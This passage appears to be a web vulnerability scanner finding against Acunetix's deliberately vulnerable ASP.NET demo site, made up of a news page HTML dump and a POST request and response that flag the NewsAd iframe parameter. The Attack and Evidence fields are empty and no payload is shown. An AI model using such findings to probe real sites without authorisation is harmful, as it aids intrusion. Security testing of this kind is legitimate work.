eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLH7tLMBwL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBNBPxOo+suXOQO2cYqA7NT0P30nF" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0
Method	POST
Parameter	NewsAd
Attack
Evidence
Show / hide Request and Response
Request Header - size: 463 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 Content-Length: 6529 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 6,529 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLWjL6iDQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBAoC8%2BYwLqXVDFYA1YYr1Hu6oI9o
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 22936
Response Body - size: 22,936 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3N